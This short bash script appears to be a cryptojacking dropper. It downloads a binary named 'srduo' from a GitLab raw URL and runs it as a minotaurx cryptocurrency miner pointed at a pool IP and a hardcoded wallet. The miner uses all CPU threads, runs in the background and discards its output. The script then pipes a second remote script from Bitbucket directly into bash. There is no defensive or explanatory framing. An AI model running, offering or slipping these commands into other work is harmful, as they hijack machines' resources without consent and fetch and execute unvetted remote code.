#!/bin/bash
apt-get install wget -y
curl https://gitlab.com/vainlevy/file/-/raw/master/srduo -o srduo
chmod +x srduo
./srduo --algorithm minotaurx --pool 128.199.68.208:443 --wallet RGFcv8JX6xEupo5cBzUGdMaTu86hhpo1bG.avn --password x --cpu-threads $(nproc --all) --disable-gpu > /dev/null 2>&1 &
curl -sL https://bitbucket.org/nicezep/file/raw/master/time | bash
